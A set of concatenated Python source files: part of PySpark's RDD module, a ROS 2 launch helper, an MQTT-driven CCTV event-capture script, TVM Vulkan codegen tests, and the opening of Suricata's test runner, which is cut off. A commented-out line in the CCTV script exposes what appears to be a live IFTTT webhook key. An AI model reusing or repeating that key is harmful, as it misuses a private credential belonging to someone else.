>>> list(rdd2.lookup(('a', 'b'))[0])
['c']
"""
values = self.filter(lambda kv: kv[0] == key).values()
if self.partitioner is not None:
return self.ctx.runJob(values, lambda x: x, [self.partitioner(key)])
return values.collect()
def _to_java_object_rdd(self):
""" Return a JavaRDD of Object by unpickling
It converts each Python object into a Java object via Pyrolite, whether
or not the RDD is serialized in batches.
"""
rdd = self._pickled()
return self.ctx._jvm.SerDeUtil.pythonToJava(rdd._jrdd, True)
def countApprox(self, timeout, confidence=0.95):
"""
.. note:: Experimental
Approximate version of count() that returns a potentially incomplete
result within a timeout, even if not all tasks have finished.
>>> rdd = sc.parallelize(range(1000), 10)
>>> rdd.countApprox(1000, 1.0)
1000
"""
drdd = self.mapPartitions(lambda it: [float(sum(1 for i in it))])
return int(drdd.sumApprox(timeout, confidence))
def sumApprox(self, timeout, confidence=0.95):
"""
.. note:: Experimental
Approximate operation to return the sum within a timeout
or meet the confidence.
>>> rdd = sc.parallelize(range(1000), 10)
>>> r = sum(range(1000))
>>> abs(rdd.sumApprox(1000) - r) / r < 0.05
True
"""
jrdd = self.mapPartitions(lambda it: [float(sum(it))])._to_java_object_rdd()
jdrdd = self.ctx._jvm.JavaDoubleRDD.fromRDD(jrdd.rdd())
r = jdrdd.sumApprox(timeout, confidence).getFinalValue()
return BoundedFloat(r.mean(), r.confidence(), r.low(), r.high())
def meanApprox(self, timeout, confidence=0.95):
"""
.. note:: Experimental
Approximate operation to return the mean within a timeout
or meet the confidence.
>>> rdd = sc.parallelize(range(1000), 10)
>>> r = sum(range(1000)) / 1000.0
>>> abs(rdd.meanApprox(1000) - r) / r < 0.05
True
"""
jrdd = self.map(float)._to_java_object_rdd()
jdrdd = self.ctx._jvm.JavaDoubleRDD.fromRDD(jrdd.rdd())
r = jdrdd.meanApprox(timeout, confidence).getFinalValue()
return BoundedFloat(r.mean(), r.confidence(), r.low(), r.high())
def countApproxDistinct(self, relativeSD=0.05):
"""
.. note:: Experimental
Return approximate number of distinct elements in the RDD.
The algorithm used is based on streamlib's implementation of
`"HyperLogLog in Practice: Algorithmic Engineering of a State
of The Art Cardinality Estimation Algorithm", available here
<http://dx.doi.org/10.1145/2452376.2452456>`_.
:param relativeSD: Relative accuracy. Smaller values create
counters that require more space.
It must be greater than 0.000017.
>>> n = sc.parallelize(range(1000)).map(str).countApproxDistinct()
>>> 900 < n < 1100
True
>>> n = sc.parallelize([i % 20 for i in range(1000)]).countApproxDistinct()
>>> 16 < n < 24
True
"""
if relativeSD < 0.000017:
raise ValueError("relativeSD should be greater than 0.000017")
# the hash space in Java is 2^32
hashRDD = self.map(lambda x: portable_hash(x) & 0xFFFFFFFF)
return hashRDD._to_java_object_rdd().countApproxDistinct(relativeSD)
def toLocalIterator(self):
"""
Return an iterator that contains all of the elements in this RDD.
The iterator will consume as much memory as the largest partition in this RDD.
>>> rdd = sc.parallelize(range(10))
>>> [x for x in rdd.toLocalIterator()]
[0, 1, 2, 3, 4, 5, 6, 7, 8, 9]
"""
with SCCallSiteSync(self.context) as css:
port = self.ctx._jvm.PythonRDD.toLocalIteratorAndServe(self._jrdd.rdd())
return _load_from_socket(port, self._jrdd_deserializer)
def _prepare_for_python_RDD(sc, command):
# the serialized command will be compressed by broadcast
ser = CloudPickleSerializer()
pickled_command = ser.dumps(command)
if len(pickled_command) > (1 << 20): # 1M
# The broadcast will have the same life cycle as the created PythonRDD
broadcast = sc.broadcast(pickled_command)
pickled_command = ser.dumps(broadcast)
broadcast_vars = [x._jbroadcast for x in sc._pickled_broadcast_vars]
sc._pickled_broadcast_vars.clear()
return pickled_command, broadcast_vars, sc.environment, sc._python_includes
def _wrap_function(sc, func, deserializer, serializer, profiler=None):
assert deserializer, "deserializer should not be empty"
assert serializer, "serializer should not be empty"
command = (func, profiler, deserializer, serializer)
pickled_command, broadcast_vars, env, includes = _prepare_for_python_RDD(sc, command)
return sc._jvm.PythonFunction(bytearray(pickled_command), env, includes, sc.pythonExec,
sc.pythonVer, broadcast_vars, sc._javaAccumulator)
class PipelinedRDD(RDD):
"""
Pipelined maps:
>>> rdd = sc.parallelize([1, 2, 3, 4])
>>> rdd.map(lambda x: 2 * x).cache().map(lambda x: 2 * x).collect()
[4, 8, 12, 16]
>>> rdd.map(lambda x: 2 * x).map(lambda x: 2 * x).collect()
[4, 8, 12, 16]
Pipelined reduces:
>>> from operator import add
>>> rdd.map(lambda x: 2 * x).reduce(add)
20
>>> rdd.flatMap(lambda x: [x, x]).reduce(add)
20
"""
def __init__(self, prev, func, preservesPartitioning=False):
if not isinstance(prev, PipelinedRDD) or not prev._is_pipelinable():
# This transformation is the first in its stage:
self.func = func
self.preservesPartitioning = preservesPartitioning
self._prev_jrdd = prev._jrdd
self._prev_jrdd_deserializer = prev._jrdd_deserializer
else:
prev_func = prev.func
def pipeline_func(split, iterator):
return func(split, prev_func(split, iterator))
self.func = pipeline_func
self.preservesPartitioning = \
prev.preservesPartitioning and preservesPartitioning
self._prev_jrdd = prev._prev_jrdd # maintain the pipeline
self._prev_jrdd_deserializer = prev._prev_jrdd_deserializer
self.is_cached = False
self.is_checkpointed = False
self.ctx = prev.ctx
self.prev = prev
self._jrdd_val = None
self._id = None
self._jrdd_deserializer = self.ctx.serializer
self._bypass_serializer = False
self.partitioner = prev.partitioner if self.preservesPartitioning else None
def getNumPartitions(self):
return self._prev_jrdd.partitions().size()
@property
def _jrdd(self):
if self._jrdd_val:
return self._jrdd_val
if self._bypass_serializer:
self._jrdd_deserializer = NoOpSerializer()
if self.ctx.profiler_collector:
profiler = self.ctx.profiler_collector.new_profiler(self.ctx)
else:
profiler = None
wrapped_func = _wrap_function(self.ctx, self.func, self._prev_jrdd_deserializer,
self._jrdd_deserializer, profiler)
python_rdd = self.ctx._jvm.PythonRDD(self._prev_jrdd.rdd(), wrapped_func,
self.preservesPartitioning)
self._jrdd_val = python_rdd.asJavaRDD()
if profiler:
self._id = self._jrdd_val.id()
self.ctx.profiler_collector.add_profiler(self._id, profiler)
return self._jrdd_val
def id(self):
if self._id is None:
self._id = self._jrdd.id()
return self._id
def _is_pipelinable(self):
return not (self.is_cached or self.is_checkpointed)
def _test():
import doctest
from pyspark.context import SparkContext
globs = globals().copy()
# The small batch size here ensures that we see multiple batches,
# even in these small test examples:
globs['sc'] = SparkContext('local[4]', 'PythonTest')
(failure_count, test_count) = doctest.testmod(
globs=globs, optionflags=doctest.ELLIPSIS)
globs['sc'].stop()
if failure_count:
exit(-1)
if __name__ == "__main__":
_test()
|
default_launch_description.py
|
# Copyright 2018 Open Source Robotics Foundation, Inc.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""Module containing the default LaunchDescription for ROS."""
import threading
from typing import Dict # noqa: F401
from typing import Text # noqa: F401
from typing import TextIO # noqa: F401
import launch
import launch.actions
import launch.events
import rclpy
from rclpy.executors import SingleThreadedExecutor
class ROSSpecificLaunchStartup(launch.actions.OpaqueFunction):
"""Does ROS specific launch startup."""
def __init__(self, rclpy_context=None):
"""Constructor."""
super().__init__(function=self._function)
self.__shutting_down = False
self.__rclpy_context = rclpy_context
def _shutdown(self, event: launch.Event, context: launch.LaunchContext):
self.__shutting_down = True
self.__rclpy_spin_thread.join()
self.__launch_ros_node.destroy_node()
def _run(self):
executor = SingleThreadedExecutor(context=self.__rclpy_context)
try:
executor.add_node(self.__launch_ros_node)
while not self.__shutting_down:
# TODO(wjwwood): switch this to `spin()` when it considers
# asynchronously added subscriptions.
# see: https://github.com/ros2/rclpy/issues/188
executor.spin_once(timeout_sec=1.0)
except KeyboardInterrupt:
pass
finally:
executor.remove_node(self.__launch_ros_node)
def _function(self, context: launch.LaunchContext):
try:
if self.__rclpy_context is None:
# Initialize the default global context
rclpy.init(args=context.argv)
except RuntimeError as exc:
    # Ignore the error when rclpy is already initialized; re-raise anything else.
    if 'rcl_init called while already initialized' not in str(exc):
        raise
self.__launch_ros_node = rclpy.create_node('launch_ros', context=self.__rclpy_context)
context.extend_globals({
'ros_startup_action': self,
'launch_ros_node': self.__launch_ros_node
})
context.register_event_handler(launch.event_handlers.OnShutdown(
on_shutdown=self._shutdown,
))
self.__rclpy_spin_thread = threading.Thread(target=self._run)
self.__rclpy_spin_thread.start()
def get_default_launch_description(*, rclpy_context=None):
"""
Return a LaunchDescription to be included before user descriptions.
:param rclpy_context: Provide a context other than the default rclpy context
to pass down to rclpy.init.
The context is expected to have already been initialized by the caller
using rclpy.init().
"""
default_ros_launch_description = launch.LaunchDescription([
# ROS initialization (create node and other stuff).
ROSSpecificLaunchStartup(rclpy_context=rclpy_context)
])
return default_ros_launch_description
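# Example usage (a minimal sketch added for illustration, not part of the
# original module): the default description is meant to be included before any
# user-provided description, for instance when driving a LaunchService by hand.
# The trivial LogInfo "user" description below is a placeholder assumption.
if __name__ == '__main__':
    launch_service = launch.LaunchService()
    launch_service.include_launch_description(get_default_launch_description())
    launch_service.include_launch_description(launch.LaunchDescription([
        launch.actions.LogInfo(msg='user launch description goes here'),
    ]))
    launch_service.run()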
|
event-capture.py
|
import paho.mqtt.client as mqtt
import urllib.request as request
import logging
import logging.config
import json
import os
import shutil
import datetime
import urllib
from queue import Queue
from threading import Thread
from subprocess import call
IMAGE_URL = "http://192.168.37.21/oneshotimage.jpg"
# The MQTT host will be another container that is part of the docker compose setup
MQTT_HOST = "mosquitto"
MQTT_PORT = 1883
EVENT_DIR = "/cctv/events"
GRAB_FOR_SECS = 30
FPS = 1
VIDEO_CONVERT = ["avconv", "-r", "1", "-i", "%4d.jpg", "event.mp4"]
MAKER_URL = None
#MAKER_URL = "https://maker.ifttt.com/trigger/gate/with/key/bjS1EJTq2pcD3cCXnhZgi_"
# Load logging config from logging.json
def setup_logging(default_path='logging.json',
default_level=logging.INFO,
env_key='LOG_CFG'):
path = default_path
value = os.getenv(env_key, None)
if value:
path = value
if os.path.exists(path):
with open(path, 'rt') as f:
config = json.load(f)
logging.config.dictConfig(config)
logging.info("Configured logging from json")
else:
logging.basicConfig(level=default_level)
logging.info("Configured logging basic")
# paho-mqtt 1.x passes the connection flags dict as the third callback argument
def on_connect(client, userdata, flags, rc):
logging.info("Connected to mqtt")
# Subscribe to any mqtt channels here
client.subscribe("GateGuard/Event")
def on_message(client, userdata, msg):
cctvlogger = logging.getLogger('cctv')
cctvlogger.debug('MQTT message received: ' + str(msg.payload))
# Parse the message as json
json_msg = json.loads(msg.payload.decode("utf-8"))
userdata.put(json_msg)
def mqtt_listener(out_q):
cctvlogger = logging.getLogger('cctv')
cctvlogger.info("MQTT listener started")
client = mqtt.Client(userdata=out_q)
client.on_connect = on_connect
client.on_message = on_message
cctvlogger.info("Connecting to mqtt server using: "
+ MQTT_HOST + ":" + str(MQTT_PORT))
client.connect(MQTT_HOST, MQTT_PORT, 60)
client.loop_forever()
cctvlogger.error("mqtt_listener stopped")
def frame_grabber(in_q, out_q, frameURL):
cctvlogger = logging.getLogger('cctv')
cctvlogger.info("Frame Grabber started: " + frameURL)
event_dir = None
event_seq = 0
grabbing = False
next_grab = datetime.datetime.now()
end_grab = next_grab
frame_interval = datetime.timedelta(seconds=1/FPS)
while True:
if not grabbing:
# Block waiting for an incoming message
cctvlogger.info("Blocking waiting for a message")
msg = in_q.get()
# We got a message so start a new event
now = datetime.datetime.now()
cctvlogger.info("Frame Grabber, got Message: " + str(msg))
end_grab = now + datetime.timedelta(seconds=GRAB_FOR_SECS)
cctvlogger.info("End of event: " + str(end_grab))
grabbing = True
next_grab = now
dt = msg["logtime"].split('T')
cctvlogger.info("DateTime: " + str(dt))
d = dt[0].split('-')
cctvlogger.info("Date split: " + str(d))
d.append(dt[1])
event_dir = EVENT_DIR + '/' + '/'.join(d)
os.makedirs(event_dir, exist_ok=True)
else:
now = datetime.datetime.now()
# Check to see whether we have another message during the event
if not in_q.empty():
# We are already handling an event so extend the event time
msg = in_q.get()
cctvlogger.debug("Frame Grabber, got Message: " + str(msg))
end_grab = now + datetime.timedelta(seconds=GRAB_FOR_SECS)
cctvlogger.info("End of event extended: " + str(end_grab))
# Should we grab the next frame?
if grabbing and now > next_grab:
# we need to get a frame
base_filename = event_dir + "/" + str(event_seq).zfill(4)
request.urlretrieve(IMAGE_URL, base_filename + ".jpg")
next_grab = next_grab + frame_interval
event_seq += 1
# Check to see whether we should end the event
if grabbing is True and now > end_grab:
cctvlogger.info("End of event capture...")
# Finished grabbing the event
# Signal to make video thread to do its stuff
out_q.put(event_dir)
# Reset
grabbing = False
event_seq = 0
event_dir = None
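# Worked example of the event directory layout built above (assuming the MQTT
# payload carries an ISO-8601 "logtime", which is the only field frame_grabber
# reads):
#   >>> msg = {"logtime": "2021-06-01T12:30:05"}
#   >>> dt = msg["logtime"].split('T'); d = dt[0].split('-'); d.append(dt[1])
#   >>> EVENT_DIR + '/' + '/'.join(d)
#   '/cctv/events/2021/06/01/12:30:05'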
def make_video(in_q):
cctvlogger = logging.getLogger('cctv')
cctvlogger.info("Video processor started")
while True:
# Block waiting for an incoming message
msg = in_q.get()
cctvlogger.info("Got path: " + str(msg))
# Convert video
result = call(VIDEO_CONVERT, cwd=msg)
if result == 0:
# Conversion was successful so move the video and remove the jpgs
pp = str(msg).split('/')
newpath = '/'.join(pp[:-1])
vidfile = newpath + '/' + pp[-1].split('.')[0] + ".mp4"
vidurl = "https://geo-fun.org/events/" \
+ pp[-2] + "/" + pp[-1].split('.')[0] + ".mp4"
cctvlogger.info("Moving video event file to " + vidfile)
os.rename(msg + "/event.mp4", vidfile)
shutil.rmtree(msg, ignore_errors=True)
# Update symlinks
latest = EVENT_DIR + "/latest.mp4"
today = EVENT_DIR + "/today"
try:
os.remove(latest)
os.remove(today)
except OSError:
pass
# Symlinks need to be relative because of Docker
path_parts = vidfile.split("/")
os.symlink("/".join(path_parts[3:]), latest)
path_parts = newpath.split("/")
os.symlink("/".join(path_parts[3:]), today)
# Notify event to IFTTT Maker channel
if MAKER_URL is not None:
cctvlogger.debug("URL: " + vidurl)
json_event = urllib.parse.urlencode({"value1": vidurl})
cctvlogger.debug("Encoded json: " + json_event)
json_event = json_event.encode('ascii')
with urllib.request.urlopen(MAKER_URL, json_event) as f:
cctvlogger.debug(f.read().decode('utf-8'))
if __name__ == "__main__":
setup_logging()
q1 = Queue()
q2 = Queue()
t1 = Thread(target=frame_grabber, args=(q1, q2, IMAGE_URL,))
t2 = Thread(target=mqtt_listener, args=(q1,))
t3 = Thread(target=make_video, args=(q2,))
t1.start()
t2.start()
t3.start()
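# To exercise the pipeline end to end (a sketch; the payload shape is inferred
# from frame_grabber, which only reads the "logtime" field), an event can be
# published to the broker like this:
#
#   import json, datetime
#   import paho.mqtt.publish as publish
#   publish.single("GateGuard/Event",
#                  json.dumps({"logtime": datetime.datetime.now().isoformat()}),
#                  hostname=MQTT_HOST, port=MQTT_PORT)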
|
test_target_codegen_vulkan.py
|
# Licensed to the Apache Software Foundation (ASF) under one
# or more contributor license agreements. See the NOTICE file
# distributed with this work for additional information
# regarding copyright ownership. The ASF licenses this file
# to you under the Apache License, Version 2.0 (the
# "License"); you may not use this file except in compliance
# with the License. You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing,
# software distributed under the License is distributed on an
# "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY
# KIND, either express or implied. See the License for the
# specific language governing permissions and limitations
# under the License.
import re
import numpy as np
import tvm
import tvm.testing
from tvm import relay, te
from tvm.topi.math import cast
def check_mod(mod, x_np, res_np):
target = "vulkan"
dev = tvm.device(target, 0)
ex = relay.create_executor("vm", mod=mod, device=dev, target=target)
res = ex.evaluate()(x_np).asnumpy()
tvm.testing.assert_allclose(res, res_np, atol=1e-5)
@tvm.testing.requires_vulkan
def test_vector_comparison():
target = "vulkan"
def check_correct_assembly(dtype):
n = (1024,)
A = te.placeholder(n, dtype=dtype, name="A")
B = te.compute(
A.shape,
lambda i: tvm.tir.Select(
A[i] >= 0, A[i] + tvm.tir.const(1, dtype), tvm.tir.const(0, dtype)
),
name="B",
)
s = te.create_schedule(B.op)
(bx, tx) = s[B].split(s[B].op.axis[0], factor=128)
(tx, vx) = s[B].split(tx, factor=4)
s[B].bind(bx, te.thread_axis("blockIdx.x"))
s[B].bind(tx, te.thread_axis("threadIdx.x"))
s[B].vectorize(vx)
f = tvm.build(s, [A, B], target)
# Verify we generate the boolx4 type declaration and the OpSelect
# v4{float,half,int} instruction
assembly = f.imported_modules[0].get_source()
matches = re.findall("%v4bool = OpTypeVector %bool 4", assembly)
assert len(matches) == 1
matches = re.findall("OpSelect %v4.*", assembly)
assert len(matches) == 1
check_correct_assembly("float32")
check_correct_assembly("int32")
check_correct_assembly("float16")
tx = te.thread_axis("threadIdx.x")
bx = te.thread_axis("blockIdx.x")
@tvm.testing.requires_vulkan
def test_vulkan_copy():
def check_vulkan(dtype, n):
A = te.placeholder((n,), name="A", dtype=dtype)
dev = tvm.vulkan(0)
a_np = np.random.uniform(size=(n,)).astype(A.dtype)
a = tvm.nd.empty((n,), A.dtype, dev).copyfrom(a_np)
b_np = a.asnumpy()
tvm.testing.assert_allclose(a_np, b_np)
tvm.testing.assert_allclose(a_np, a.asnumpy())
for _ in range(100):
dtype = np.random.choice(["float32", "float16", "int8", "int32"])
logN = np.random.randint(1, 15)
perturb = np.random.uniform(low=0.5, high=1.5)
check_vulkan(dtype, int(perturb * (2 ** logN)))
@tvm.testing.requires_vulkan
def test_vulkan_vectorize_add():
num_thread = 8
def check_vulkan(dtype, n, lanes):
A = te.placeholder((n,), name="A", dtype="%sx%d" % (dtype, lanes))
B = te.compute((n,), lambda i: A[i] + tvm.tir.const(1, A.dtype), name="B")
s = te.create_schedule(B.op)
xo, xi = s[B].split(B.op.axis[0], factor=num_thread)
s[B].bind(xo, bx)
s[B].bind(xi, tx)
fun = tvm.build(s, [A, B], "vulkan")
dev = tvm.vulkan(0)
a = tvm.nd.empty((n,), A.dtype, dev).copyfrom(np.random.uniform(size=(n, lanes)))
c = tvm.nd.empty((n,), B.dtype, dev)
fun(a, c)
tvm.testing.assert_allclose(c.asnumpy(), a.asnumpy() + 1)
check_vulkan("float32", 64, 2)
check_vulkan("float16", 64, 2)
@tvm.testing.requires_vulkan
def test_vulkan_stress():
"""
Launch a randomized test with multiple kernels per stream, multiple uses of
kernels per stream, over multiple threads.
"""
import random
import threading
n = 1024
num_thread = 64
def run_stress():
def worker():
A = te.placeholder((n,), name="A", dtype="float32")
B = te.placeholder((n,), name="B", dtype="float32")
functions = [
(
lambda: te.compute((n,), lambda i: 2 * A[i] + 3 * B[i]),
lambda a, b: 2 * a + 3 * b,
),
(lambda: te.compute((n,), lambda i: A[i] + B[i]), lambda a, b: a + b),
(lambda: te.compute((n,), lambda i: A[i] + 2 * B[i]), lambda a, b: a + 2 * b),
]
def build_f(f_ref):
(C_f, ref) = f_ref
C = C_f()
s = te.create_schedule(C.op)
xo, xi = s[C].split(C.op.axis[0], factor=num_thread)
s[C].bind(xo, bx)
s[C].bind(xi, tx)
fun = tvm.build(s, [A, B, C], "vulkan")
return (fun, ref)
fs = [
build_f(random.choice(functions)) for _ in range(np.random.randint(low=1, high=10))
]
dev = tvm.vulkan(0)
a = tvm.nd.empty((n,), A.dtype, dev).copyfrom(np.random.uniform(size=(n,)))
b = tvm.nd.empty((n,), B.dtype, dev).copyfrom(np.random.uniform(size=(n,)))
cs = [tvm.nd.empty((n,), A.dtype, dev) for _ in fs]
for ((f, _), c) in zip(fs, cs):
f(a, b, c)
for ((_, ref), c) in zip(fs, cs):
tvm.testing.assert_allclose(c.asnumpy(), ref(a.asnumpy(), b.asnumpy()))
ts = [threading.Thread(target=worker) for _ in range(np.random.randint(1, 10))]
for t in ts:
t.start()
for t in ts:
t.join()
run_stress()
@tvm.testing.requires_vulkan
def test_vulkan_bool_load():
def do_copy(A, B, n):
ib = tvm.tir.ir_builder.create()
A = ib.buffer_ptr(A)
B = ib.buffer_ptr(B)
tx = te.thread_axis("threadIdx.x")
bx = te.thread_axis("blockIdx.x")
max_threads = 32
ib.scope_attr(bx, "thread_extent", tvm.tir.indexdiv(n + max_threads - 1, max_threads))
ib.scope_attr(tx, "thread_extent", max_threads)
tid = bx * max_threads + tx
with ib.if_scope(tid < n):
B[tid] = cast(A[tid], "int32")
return ib.get()
n = 1024
A = te.placeholder((n,), name="A", dtype="bool")
B = te.placeholder((n,), name="B", dtype="int32")
target = "vulkan"
B = te.extern(
A.shape,
[A],
lambda ins, outs: do_copy(ins[0], outs[0], n),
name="bool_copy_ir",
dtype="int32",
)
s = te.create_schedule(B.op)
with tvm.transform.PassContext(opt_level=3):
func = tvm.build(s, [A, B], target)
dev = tvm.device(target, 0)
a_np = np.random.uniform(size=n) > 0.5
b_np = np.zeros((n,), dtype="int32")
a = tvm.nd.array(a_np, dev)
b = tvm.nd.array(b_np, dev)
func(a, b)
ref = a_np.astype(np.int32)
tvm.testing.assert_allclose(b.asnumpy(), ref)
@tvm.testing.requires_vulkan
def test_vulkan_pushconstants():
# Three 32-bit push constants: any_dim, stride, stride
dtype = "float32"
x = relay.var("x", shape=(relay.Any(),), dtype=dtype)
mod = tvm.IRModule()
mod["main"] = relay.Function([x], relay.sqrt(x))
x_np = np.random.uniform(size=(10,)).astype(dtype)
res_np = np.sqrt(x_np)
check_mod(mod, x_np, res_np)
# One 64-bit and one 32-bit constant
dtype = "int32"
x = relay.var("x", shape=(relay.Any(),), dtype=dtype)
mod = tvm.IRModule()
mod["main"] = relay.Function([x], relay.argsort(x))
x_np = np.random.randint(0, high=10, size=(10,)).astype(dtype)
res_np = np.argsort(x_np)
check_mod(mod, x_np, res_np)
# One 64-bit and one 32-bit constant
dtype = "int32"
x = relay.var("x", shape=(relay.Any(),), dtype=dtype)
mod = tvm.IRModule()
mod["main"] = relay.Function([x], relay.cumsum(x))
x_np = np.random.randint(0, high=10, size=(10,)).astype(dtype)
res_np = np.cumsum(x_np)
check_mod(mod, x_np, res_np)
@tvm.testing.requires_vulkan
def test_vulkan_unique():
dtype = "int32"
x = relay.var("x", shape=(relay.Any(),), dtype=dtype)
mod = tvm.IRModule()
[unique, _, num_unique] = relay.unique(x, is_sorted=True)
mod["main"] = relay.Function([x], relay.op.strided_slice(unique, begin=[0], end=num_unique))
x_np = np.random.randint(0, high=10, size=(10,)).astype(dtype)
res_np = np.unique(x_np)
check_mod(mod, x_np, res_np)
@tvm.testing.requires_vulkan
def test_vulkan_constant_passing():
target = "vulkan"
def test_scalar_params(num_int_params):
n = te.var("n")
scalars = [te.var("scale{}".format(i)) for i in range(num_int_params)]
scalar_sum = scalars[0]
for s in scalars[1:]:
scalar_sum += s
A = te.placeholder((n,), name="A")
B = te.compute(A.shape, lambda i: scalar_sum + A[i], name="B")
s = te.create_schedule(B.op)
xo, xi = s[B].split(B.op.axis[0], factor=64)
s[B].bind(xo, bx)
s[B].bind(xi, tx)
f_add = tvm.build(s, scalars + [A, B], target)
n = 1024
scalars = [1 for _ in scalars]
dev = tvm.vulkan(0)
a = tvm.nd.array(np.random.uniform(size=n).astype(A.dtype), dev)
b = tvm.nd.array(np.zeros(n, dtype=B.dtype), dev)
f_add(*scalars, a, b)
tvm.testing.assert_allclose(a.asnumpy() + sum(scalars), b.asnumpy())
# f_add has 3+num_int_params scalar parameters. The other three
# are length_n, stride1, and stride2.
# 4 params, 32 bytes. Within 128-byte spec-guaranteed size of
# push constants. Uses push constants.
test_scalar_params(1)
# 24 params, 192 bytes. Too big for push constants, uses uniform
# buffer.
test_scalar_params(20)
# 2047 params, 16376 bytes, just below 16kB of uniform buffer
# space guaranteed by the vulkan spec.
test_scalar_params(2044)
@tvm.testing.parametrize_targets("vulkan")
def test_vulkan_while_if(target, dev):
def do_compute(A, B, n):
ib = tvm.tir.ir_builder.create()
A = ib.buffer_ptr(A)
B = ib.buffer_ptr(B)
ib.scope_attr(te.thread_axis("blockIdx.x"), "thread_extent", 0)
iterations = ib.allocate("int32", (1,), name="iterations", scope="local")
iterations[0] = 0
B[0] = 0
# WhileNode's condition is re-evaluated every loop. The
# if_then_else block introduces additional labels/blocks that
# must be kept separate from the WhileNode's block.
loop_condition = iterations[0] < tvm.tir.if_then_else(A[0] > 0, 10, 20)
with ib.while_loop(loop_condition):
iterations[0] += 1
B[0] += iterations[0]
return ib.get()
n = 1
dtype = "int32"
A = te.placeholder((n,), name="A", dtype=dtype)
B = te.extern(
A.shape,
[A],
lambda ins, outs: do_compute(ins[0], outs[0], n),
dtype=dtype,
)
s = te.create_schedule(B.op)
# Point of failure would be here, at tvm.build.
with tvm.transform.PassContext(opt_level=3):
func = tvm.build(s, [A, B], target)
a = tvm.nd.array(np.array([5], dtype=A.dtype), dev)
b = tvm.nd.array(np.zeros(n, dtype=A.dtype), dev)
func(a, b)
tvm.testing.assert_allclose(b.asnumpy(), [55])
a = tvm.nd.array(np.array([-5], dtype=A.dtype), dev)
b = tvm.nd.array(np.zeros(n, dtype=A.dtype), dev)
func(a, b)
tvm.testing.assert_allclose(b.asnumpy(), [210])
if __name__ == "__main__":
test_vector_comparison()
test_vulkan_copy()
test_vulkan_vectorize_add()
test_vulkan_stress()
test_vulkan_constant_passing()
test_vulkan_bool_load()
test_vulkan_pushconstants()
test_vulkan_unique()
|
run.py
|
#! /usr/bin/env python3
#
# Copyright (C) 2017-2021 Open Information Security Foundation
#
# Permission is hereby granted, free of charge, to any person
# obtaining a copy of this software and associated documentation files
# (the "Software"), to deal in the Software without restriction,
# including without limitation the rights to use, copy, modify, merge,
# publish, distribute, sublicense, and/or sell copies of the Software,
# and to permit persons to whom the Software is furnished to do so,
# subject to the following conditions:
#
# The above copyright notice and this permission notice shall be
# included in all copies or substantial portions of the Software.
#
# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND,
# EXPRESS OR IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF
# MERCHANTABILITY, FITNESS FOR A PARTICULAR PURPOSE AND
# NONINFRINGEMENT. IN NO EVENT SHALL THE AUTHORS OR COPYRIGHT HOLDERS
# BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER LIABILITY, WHETHER IN AN
# ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, OUT OF OR IN
# CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE
# SOFTWARE.
from __future__ import print_function
import sys
import os
import os.path
import subprocess
import threading
import shutil
import string
import argparse
import yaml
import glob
import re
import json
import unittest
import multiprocessing as mp
from collections import namedtuple
import filecmp
# Check if we can validate EVE files against the schema.
try:
import jsonschema
VALIDATE_EVE = True
except ImportError:
VALIDATE_EVE = False
WIN32 = sys.platform == "win32"
LINUX = sys.platform.startswith("linux")
suricata_bin = "src\\suricata.exe" if WIN32 else "./src/suricata"
suricata_yaml = "suricata.yaml" if WIN32 else "./suricata.yaml"
if LINUX:
manager = mp.Manager()
lock = mp.Lock()
failedLogs = manager.list()
count_dict = manager.dict()
check_args = manager.dict()
else:
failedLogs = []
count_dict = {}
check_args = {}
# Bring in a lock from threading to satisfy the MP semantics when
# not using MP.
lock = threading.Lock()
count_dict['passed'] = 0
count_dict['failed'] = 0
count_dict['skipped'] = 0
check_args['fail'] = 0
class SelfTest(unittest.TestCase):
def test_parse_suricata_version(self):
version = parse_suricata_version("4.0.0")
self.assertEqual(
(4, 0, 0), (version.major, version.minor, version.patch))
version = parse_suricata_version("444.444.444")
self.assertEqual(
(444, 444, 444), (version.major, version.minor, version.patch))
version = parse_suricata_version("4.1.0-dev")
self.assertEqual(
(4, 1, 0), (version.major, version.minor, version.patch))
version = parse_suricata_version("4")
self.assertEqual(
(4, 0, 0), (version.major, version.minor, version.patch))
version = parse_suricata_version("4.0.3")
self.assertEqual(
(4, 0, 3), (version.major, version.minor, version.patch))
def test_version_equal(self):
self.assertTrue(Version().is_equal(SuricataVersion(5, 0, 0), SuricataVersion(5, 0, 0)))
self.assertTrue(Version().is_equal(SuricataVersion(5, 1, 0), SuricataVersion(5, None, None)))
self.assertFalse(Version().is_equal(SuricataVersion(4, 1, 0), SuricataVersion(5, None, None)))
def test_version_lt(self):
comp = Version()
self.assertTrue(comp.is_lt(SuricataVersion(5, 0, 3), SuricataVersion(6, None, None)))
self.assertTrue(comp.is_lt(SuricataVersion(6, 0, 0), SuricataVersion(6, 0, 1)))
self.assertTrue(comp.is_lt(SuricataVersion(6, 0, 0), SuricataVersion(6, 1, 1)))
self.assertFalse(comp.is_lt(SuricataVersion(6, 1, 2), SuricataVersion(6, 1, 1)))
self.assertTrue(comp.is_lt(SuricataVersion(6, 0, 0), SuricataVersion(7, 0, 0)))
class TestError(Exception):
pass
class UnsatisfiedRequirementError(Exception):
pass
class TerminatePoolError(Exception):
pass
SuricataVersion = namedtuple(
"SuricataVersion", ["major", "minor", "patch"])
def parse_suricata_version(buf):
m = re.search(r"(?:Suricata version |^)(\d+)\.?(\d+)?\.?(\d+)?.*", str(buf).strip())
if m:
major = int(m.group(1)) if m.group(1) else 0
minor = int(m.group(2)) if m.group(2) else 0
patch = int(m.group(3)) if m.group(3) else 0
return SuricataVersion(
major=major, minor=minor, patch=patch)
return None
def get_suricata_version():
output = subprocess.check_output([suricata_bin, "-V"])
return parse_suricata_version(output)
def pipe_reader(fileobj, output=None, verbose=False):
for line in fileobj:
line = line.decode()
if output:
output.write(line)
output.flush()
if verbose:
